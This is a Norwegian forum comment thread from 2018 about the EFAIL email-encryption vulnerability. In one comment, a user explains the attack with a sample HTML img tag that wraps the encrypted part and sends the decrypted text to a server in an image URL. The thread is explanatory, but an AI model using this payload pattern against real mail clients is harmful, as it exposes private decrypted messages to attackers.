Harald Brombach (digi.no) Skrevet 14. mai 2018 Del Skrevet 14. mai 2018 Brukerne bes deaktivere støtten for både PGP og S/MIME.Kritisk sårbarhet kan avsløre innholdet i kryptert epost Lenke til kommentar
tommyb Skrevet 14. mai 2018 Del Skrevet 14. mai 2018 (endret) Brukerne bes deaktivere støtten for både PGP og S/MIME. Oi oi, den setningen kan raskt tolkes som "PGP- og S/MIME-brukerne bes slå av kryptering". Kanskje en idé å bytte plassering på den setningen og Rådes til å bruke andre, sikre tjenester Endret 14. mai 2018 av tommyb Lenke til kommentar
G Skrevet 14. mai 2018 Del Skrevet 14. mai 2018 (endret) Dette var en absurd artikkel. PGP er vel ikke brutt vel? Så man kan fint pakke inn en tekstfil i PGP manuellt og vedlegge en e-post uten at noen så lett klarer å knekke den krypteringen. Artikkelen selv om den forsøker å forklare litt, gir et negativt inntrykk av PGP. Ting må komme enda klarere fram. Endret 14. mai 2018 av G 2 Lenke til kommentar
6EKEP2QZ Skrevet 14. mai 2018 Del Skrevet 14. mai 2018 Detaljene for denne svakheten er allerede sluppet: https://efail.de/ Lenke til kommentar
Harald Brombach (digi.no) Skrevet 14. mai 2018 Forfatter Del Skrevet 14. mai 2018 Detaljene for denne svakheten er allerede sluppet: https://efail.de/ Takk! Lenke til kommentar
tommyb Skrevet 14. mai 2018 Del Skrevet 14. mai 2018 Hvis jeg forstår dette rett, så er det håndteringen av eposten etter den er dekryptert som er problemet. Det er et systematisk problem, mer enn en implementasjonsfeil. Efail nevner Apple Mail, iOS Mail and Mozilla Thunderbird, men det er sikkert flere som gjør dette på samme måte. Epostene blir delt i tre deler, der kun den midterste delen inneholder kryptert innhold. Den første angrepstypen beskrevet går ut på å manipulere de to ikke-krypterte delene, slik at den første delen inneholder et ikke-avsluttet felt, og den siste delen avslutter det. <img src="/www.diskusjon.no/icon.jpg? --- kryptert melding er her --- "> Når epost-programmet deretter setter sammen innholdet igjen til en enkelt lesbar kode, henter den sammensatte koden i eksemplet en bildefil der den dekrypterte meldingen er en del av adressen <img src="http://www.diskusjon.no/icon.jpg?dekryptert%20melding%20kommer%20her"> Epostklienten legger altså den dekrypterte delen inn i et request. Denne meldingen kan da høstes i fred av de som styrer serveren, men den kan også avleses i alle ledd på veien hvis man etterspurte bildet over http. For at dette skal kunne skje, må de altså manipulere en epost til å kontakte en server. Det kan de gjøre med gamle eposter de har lurt lenge på hva inneholdt, eller de kan manipulere nye eposter underveis. En PGP-kryptering som ikke er en del av en epost, vil ikke bli behandlet på samme måte. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå